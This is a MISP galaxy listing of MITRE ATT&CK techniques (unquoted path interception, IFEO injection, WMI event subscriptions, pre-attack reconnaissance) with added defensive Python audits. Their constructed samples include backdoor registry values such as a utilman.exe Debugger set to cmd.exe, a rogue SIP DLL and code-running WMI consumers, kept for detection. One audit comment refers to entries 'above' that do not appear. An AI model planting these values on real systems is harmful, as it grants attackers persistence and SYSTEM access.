Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

Internal MISP references

UUID 70d81154-b187-45f9-8ec5-295d01255979 which can be used as unique global reference for Executable Installer File Permissions Weakness - T1574.005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.005
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion']
mitre_data_sources ['File: File Creation', 'File: File Modification', 'Module: Module Load', 'Process: Process Creation', 'Service: Service Metadata']
mitre_platforms ['Windows']

Path Interception by Unquoted Path - T1574.009

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Service paths (stored in Windows Registry keys) (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
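
The resolution rule behind the example above is mechanical: for an unquoted path with spaces, Windows tries each space-delimited prefix with .exe appended before it reaches the intended program. The following is an added example, not part of the ATT&CK text, that enumerates those candidate paths in order and then, given a set of directories a standard user can write to, reports which candidate an attacker could actually plant. The service ImagePath values and the writable-directory set are constructed for the example; on a real host the writable set would come from the ACLs (icacls or Get-Acl), which this offline example does not query.

```python
from __future__ import annotations
import ntpath


def interception_candidates(image_path: str) -> list[str]:
    """Executables Windows may try, in order, for an unquoted service or
    shortcut path: at each space the prefix is tried with ".exe" appended,
    until a prefix that already names the intended .exe is reached."""
    path = image_path.strip()
    if path.startswith('"'):
        return []                      # quoted: the program name is unambiguous
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            return candidates + [prefix]   # last entry is the intended binary
        candidates.append(prefix + ".exe")
    return []                          # no .exe in the string; not modelled here


def assess(image_path: str, writable_dirs: set[str]) -> dict:
    """Report whether a path is interceptable and, given directories a
    low-privileged user can write to, which decoy an attacker could plant."""
    cands = interception_candidates(image_path)
    decoys = cands[:-1]                # everything before the intended binary
    plantable = [c for c in decoys
                 if ntpath.dirname(c).lower().rstrip("\\") in writable_dirs]
    return {"vulnerable": bool(decoys), "decoys": decoys, "plantable": plantable}


# Constructed service ImagePath values and a constructed set of directories
# assumed writable by a standard user (derive it from ACLs on a real host).
SERVICES = {
    "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" -run',
    "BadSvc": r"C:\Program Files\Bad Vendor\svc host\bad.exe -k",
    "CoreSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
}
WRITABLE_BY_USERS = {r"c:\program files\bad vendor"}


def audit_services(services: dict[str, str], writable: set[str]) -> dict[str, dict]:
    """Only the services whose path has at least one decoy position."""
    result = {}
    for name, path in services.items():
        info = assess(path, writable)
        if info["vulnerable"]:
            result[name] = info
    return result


if __name__ == "__main__":
    for name, info in audit_services(SERVICES, WRITABLE_BY_USERS).items():
        print(name, "decoys:", info["decoys"], "plantable:", info["plantable"])
```

A decoy position that sits in a directory only administrators can write to (C:\ and C:\Program Files by default) is not exploitable by a standard user, which is why the example separates "vulnerable" (the path is ambiguous) from "plantable" (the ambiguity is reachable).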

Internal MISP references

UUID bf96a5a3-3bce-43b7-8597-88545984c07b which can be used as unique global reference for Path Interception by Unquoted Path - T1574.009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.009
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion']
mitre_data_sources ['File: File Creation', 'File: File Modification', 'Process: Process Creation']
mitre_platforms ['Windows']

Image File Execution Options Injection - T1546.012

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<executable>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
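
Every hijack in this technique and in SIP and Trust Provider Hijacking (T1553.003) above is a Registry value pointing at a DLL or program, so one audit over a Registry export covers both. The following is an added example, not part of the ATT&CK text or of the cited SpectorOps tooling: it parses a .reg export, flags SIP entries (Dll/FuncName) and trust-provider FinalPolicy entries ($DLL/$Function) whose module is not a Microsoft cryptographic DLL living in the system directory, flags any IFEO Debugger value (louder when the target is an accessibility binary such as utilman.exe), and flags the silent-exit pair described above, a GlobalFlag with the 0x200 monitoring bit plus a MonitorProcess value under SilentProcessExit. The export is constructed; the three GUIDs in it are the Authenticode PE SIP, the PowerShell SIP, and the Authenticode trust provider, and the module allowlist and system-directory set are assumptions for the example that should be rebuilt from a known-good host.

```python
import ntpath

# Constructed .reg export (not from a real host). The second, fourth, fifth
# and sixth keys are the tampered ones.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}]
"Dll"="C:\\Windows\\System32\\WINTRUST.DLL"
"FuncName"="CryptSIPVerifyIndirectData"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"Dll"="C:\\Users\\Public\\evilsip.dll"
"FuncName"="AlwaysTrue"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}]
"$DLL"="WINTRUST.DLL"
"$Function"="SoftpubAuthenticode"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\Users\\Public\\beacon.exe"
"""

# Microsoft modules expected behind SIP and trust-provider entries: an
# allowlist assumed for this example, to be rebuilt from a known-good host.
KNOWN_MS_DLLS = {"wintrust.dll", "mssip32.dll", "pwrshsip.dll", "msisip.dll", "appxsip.dll"}
SYSTEM_DIRS = {"", r"c:\windows\system32", r"c:\windows\syswow64"}
ACCESSIBILITY_BINS = {"utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
                      "magnify.exe", "displayswitch.exe", "atbroker.exe"}
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200   # GlobalFlag bit that enables silent-exit monitoring


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: data}}; REG_SZ data is
    unescaped, other types are kept as their raw 'dword:...' style token."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            if data.startswith('"'):
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            keys[current][name.strip('"')] = data
    return keys


def trusted_module(path):
    """A known Microsoft DLL, referenced bare or from the system directory."""
    base = ntpath.basename(path).lower()
    folder = ntpath.dirname(path).lower().rstrip("\\")
    return base in KNOWN_MS_DLLS and folder in SYSTEM_DIRS


def audit(keys):
    """Return (kind, key, detail) for every entry worth a second look."""
    findings = []
    for key, vals in keys.items():
        k, leaf = key.lower(), key.rsplit("\\", 1)[-1].lower()
        if "\\cryptography\\oid\\encodingtype 0\\cryptsipdll" in k:
            if not trusted_module(vals.get("Dll", "")):
                findings.append(("sip_hijack", key, f"{vals.get('Dll')}!{vals.get('FuncName')}"))
        elif "\\cryptography\\providers\\trust\\finalpolicy\\" in k:
            if not trusted_module(vals.get("$DLL", "")):
                findings.append(("trust_provider_hijack", key, f"{vals.get('$DLL')}!{vals.get('$Function')}"))
        elif "\\image file execution options\\" in k:
            if "Debugger" in vals:
                kind = "ifeo_debugger_accessibility" if leaf in ACCESSIBILITY_BINS else "ifeo_debugger"
                findings.append((kind, key, vals["Debugger"]))
            flag = vals.get("GlobalFlag", "")
            if flag.startswith("dword:") and int(flag[6:], 16) & FLG_MONITOR_SILENT_PROCESS_EXIT:
                findings.append(("ifeo_silent_exit_flag", key, flag))
        elif "\\silentprocessexit\\" in k and "MonitorProcess" in vals:
            findings.append(("silent_exit_monitor", key, vals["MonitorProcess"]))
    return findings


if __name__ == "__main__":
    for kind, key, detail in audit(parse_reg(SAMPLE_REG)):
        leaf = key.rsplit("\\", 1)[-1]
        print(f"{kind:28} {leaf:45} {detail}")
```

A bare module name such as WINTRUST.DLL passes the check here because that is how several default entries are written, which is exactly the gap the page's note about DLL Search Order Hijacking points at: an unqualified name is resolved by the loader's search order, so the audit should be paired with a check that no same-named DLL exists ahead of System32 on that search path.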

Internal MISP references

UUID 6d4a7fb3-5a24-42be-ae61-6728a2b581f6 which can be used as unique global reference for Image File Execution Options Injection - T1546.012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1546.012
kill_chain ['attack-Windows:privilege-escalation', 'attack-Windows:persistence']
mitre_data_sources ['Command: Command Execution', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']

Friend/Follow/Connect to targets of interest - T1344

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

Internal MISP references

UUID 103d72e6-7e0d-4b3a-9373-c38567305c33 which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1344 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1344
kill_chain ['pre-attack:persona-development']

Friend/Follow/Connect to targets of interest - T1364

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A form of social engineering designed to build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)

Internal MISP references

UUID eacd1efe-ee30-4b03-b58f-5b3b1adfe45d which can be used as unique global reference for Friend/Follow/Connect to targets of interest - T1364 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1364
kill_chain ['pre-attack:stage-capabilities']

Identify personnel with an authority/privilege - T1271

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Personnel inside a company may have non-electronic specialized access, authorities, or privileges that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)

Internal MISP references

UUID 762771c2-3675-4535-88e9-b1f891758974 which can be used as unique global reference for Identify personnel with an authority/privilege - T1271 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1271
kill_chain ['pre-attack:people-information-gathering']

Receive KITs/KIQs and determine requirements - T1239

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary's nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)

Internal MISP references

UUID acfcbe7a-4dbc-4471-be2b-134faf479e3e which can be used as unique global reference for Receive KITs/KIQs and determine requirements - T1239 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1239
kill_chain ['pre-attack:priority-definition-direction']

Identify job postings and needs/gaps - T1248

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Job postings, on either company sites or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in attack or provide insight into possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)

Internal MISP references

UUID c721b235-679a-4d76-9ae9-e08921fccf84 which can be used as unique global reference for Identify job postings and needs/gaps - T1248 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1248
kill_chain ['pre-attack:technical-information-gathering']

Analyze hardware/software security defensive capabilities - T1294

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)

Internal MISP references

UUID a1e8d61b-22e1-4983-8485-96420152ecd8 which can be used as unique global reference for Analyze hardware/software security defensive capabilities - T1294 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1294
kill_chain ['pre-attack:technical-weakness-identification']

Discover target logon/email address format - T1255

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)

Internal MISP references

UUID ef0f816a-d561-4953-84c6-2a2936c96957 which can be used as unique global reference for Discover target logon/email address format - T1255 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1255
kill_chain ['pre-attack:technical-information-gathering']

Identify job postings and needs/gaps - T1267

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Job postings, on either company sites or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)

Internal MISP references

UUID 0722cd65-0c83-4c89-9502-539198467ab1 which can be used as unique global reference for Identify job postings and needs/gaps - T1267 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1267
kill_chain ['pre-attack:people-information-gathering']

Identify job postings and needs/gaps - T1278

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Job postings, on either company sites or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as an under-resourced IT shop). Job postings can also provide information on an organization's structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)

Internal MISP references

UUID 7718e92f-b011-4f88-b822-ae245a1de407 which can be used as unique global reference for Identify job postings and needs/gaps - T1278 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1278
kill_chain ['pre-attack:organizational-information-gathering']

Analyze organizational skillsets and deficiencies - T1300

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Analyze strengths and weaknesses of the target for potential areas on which to focus compromise efforts. (Citation: FakeLinkedIn)

Internal MISP references

UUID 7baccb84-356c-4e89-8c5d-58e701f033fc which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1300 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1300
kill_chain ['pre-attack:organizational-weakness-identification']

Exfiltration Over Other Network Medium - T1011

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Internal MISP references

UUID 51ea26b1-ff1e-4faa-b1a0-1114cd298c87 which can be used as unique global reference for Exfiltration Over Other Network Medium - T1011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1011
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']

Network Traffic Capture or Redirection - T1410

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.

Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.

An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.

If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

Internal MISP references

UUID 3b0b604f-10db-41a0-b54c-493124d455b9 which can be used as unique global reference for Network Traffic Capture or Redirection - T1410 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1410
kill_chain ['mobile-attack-Android:collection', 'mobile-attack-iOS:collection', 'mobile-attack-Android:credential-access', 'mobile-attack-iOS:credential-access']
mitre_platforms ['Android', 'iOS']

Determine 3rd party infrastructure services - T1260

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Infrastructure services include the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)

Internal MISP references

UUID 856a9371-4f0f-4ea9-946e-f3144204240f which can be used as unique global reference for Determine 3rd party infrastructure services - T1260 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1260
kill_chain ['pre-attack:technical-information-gathering']

Analyze presence of outsourced capabilities - T1303

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)

Internal MISP references

UUID 34450117-d1d5-417c-bb74-4359fc6551ca which can be used as unique global reference for Analyze presence of outsourced capabilities - T1303 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1303
kill_chain ['pre-attack:organizational-weakness-identification']

Boot or Logon Initialization Scripts - T1037

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

Internal MISP references

UUID 03259939-0b57-482f-8eb5-87c0e0d54334 which can be used as unique global reference for Boot or Logon Initialization Scripts - T1037 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1037
kill_chain ['attack-macOS:persistence', 'attack-Windows:persistence', 'attack-Linux:persistence', 'attack-Network:persistence', 'attack-macOS:privilege-escalation', 'attack-Windows:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Network:privilege-escalation']
mitre_data_sources ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation']
mitre_platforms ['macOS', 'Windows', 'Linux', 'Network']

Data from Network Shared Drive - T1039

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Internal MISP references

UUID ae676644-d2d2-41b7-af7e-9bed1b55898c which can be used as unique global reference for Data from Network Shared Drive - T1039 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1039
kill_chain ['attack-Linux:collection', 'attack-macOS:collection', 'attack-Windows:collection']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Share: Network Share Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']

Download New Code at Runtime - T1407

Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with Execution Guardrails techniques, detecting malicious code downloaded after installation could be difficult.

On Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s JavascriptInterface capability.

On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch)

Internal MISP references

UUID 6c49d50f-494d-4150-b774-a655022d20a6 which can be used as unique global reference for Download New Code at Runtime - T1407 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1407
kill_chain ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion']
mitre_platforms ['Android', 'iOS']

Windows Management Instrumentation Event Subscription - T1084

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
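A defender-side check for the subscriptions this entry describes, added here as an example that is not part of the ATT&CK or MISP content. It takes an inventory of the three object types involved (filters, consumers, bindings) and flags every binding whose consumer class executes code, noting when the filter fires on the wall-clock or uptime triggers the text names. The inventory below is constructed; the "SCM Event Log" pair mirrors the binding present by default in root\subscription on Windows (an assumption to verify on a reference host), and the "Uptime" pair and its payload path are invented.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class EventFilter:
    name: str
    query: str            # WQL stored in __EventFilter.Query


@dataclass(frozen=True)
class EventConsumer:
    name: str
    consumer_class: str   # WMI class of the consumer instance
    payload: str          # CommandLineTemplate / ScriptText, or "" for consumers that run no code


@dataclass(frozen=True)
class Binding:
    filter_name: str
    consumer_name: str


# Consumer classes that execute caller-supplied code when the bound filter fires.
CODE_RUNNING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Classes whose presence in a filter query marks a clock- or uptime-based trigger.
TIME_TRIGGER_CLASSES = ("win32_localtime", "win32_utctime", "win32_perfformatteddata_perfos_system")

# Constructed inventory. The SCM pair is the stock Windows binding (assumption); the Uptime pair is invented.
SAMPLE_FILTERS = [
    EventFilter("SCM Event Log Filter", "select * from MSFT_SCMEventLogEvent"),
    EventFilter("UptimeFilter",
                "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
                "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"),
]
SAMPLE_CONSUMERS = [
    EventConsumer("SCM Event Log Consumer", "NTEventLogEventConsumer", ""),
    EventConsumer("UptimeConsumer", "CommandLineEventConsumer", r"C:\ProgramData\updater.exe"),  # constructed path
]
SAMPLE_BINDINGS = [
    Binding("SCM Event Log Filter", "SCM Event Log Consumer"),
    Binding("UptimeFilter", "UptimeConsumer"),
]


def audit_subscriptions(filters: List[EventFilter], consumers: List[EventConsumer],
                        bindings: List[Binding]) -> List[Dict[str, str]]:
    """Return one finding per binding that would run code, plus any binding with a missing endpoint."""
    by_filter = {f.name: f for f in filters}
    by_consumer = {c.name: c for c in consumers}
    findings: List[Dict[str, str]] = []
    for b in bindings:
        label = f"{b.filter_name} -> {b.consumer_name}"
        flt, con = by_filter.get(b.filter_name), by_consumer.get(b.consumer_name)
        if flt is None or con is None:
            findings.append({"binding": label, "issue": "dangling binding", "payload": ""})
            continue
        if con.consumer_class not in CODE_RUNNING_CONSUMERS:
            continue  # e.g. the default NTEventLogEventConsumer, which only writes an event log record
        query = flt.query.lower()
        trigger = "time-based" if any(cls in query for cls in TIME_TRIGGER_CLASSES) else "other"
        findings.append({"binding": label,
                         "issue": f"{con.consumer_class} bound to {trigger} filter",
                         "payload": con.payload})
    return findings


if __name__ == "__main__":
    for finding in audit_subscriptions(SAMPLE_FILTERS, SAMPLE_CONSUMERS, SAMPLE_BINDINGS):
        print(finding)
```

On a live host the three lists can be gathered with Get-WmiObject against the root\subscription namespace (classes __EventFilter, __EventConsumer and __FilterToConsumerBinding) and fed in unchanged; a binding whose consumer payload points outside the usual program directories is the one to look at first.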

Internal MISP references

UUID e906ae4d-1d3a-4675-be23-22f7311c0da4 which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1084 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1084
kill_chain ['attack-Windows:persistence']
mitre_platforms ['Windows']

Custom Command and Control Protocol - T1094

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing Application Layer Protocol. Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.

Internal MISP references

UUID f72eb8a8-cd4c-461d-a814-3f862befbf00 which can be used as unique global reference for Custom Command and Control Protocol - T1094 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1094
kill_chain ['attack-Linux:command-and-control', 'attack-macOS:command-and-control', 'attack-Windows:command-and-control']
mitre_platforms ['Linux', 'macOS', 'Windows']

Trusted Developer Utilities Proxy Execution - T1127

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

Internal MISP references

UUID ff25900d-76d5-449b-a351-8824e62fc81b which can be used as unique global reference for Trusted Developer Utilities Proxy Execution - T1127 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1127
kill_chain ['attack-Windows:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'Process: Process Creation']
mitre_platforms ['Windows']

App Delivered via Web Download - T1431

The application is downloaded from an arbitrary web site. A link to the application's download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.

Platforms: Android, iOS

Internal MISP references

UUID 6b846ad0-cc20-4db6-aa34-91561397c5e2 which can be used as unique global reference for App Delivered via Web Download - T1431 in MISP communities and other software using the MISP galaxy

External references
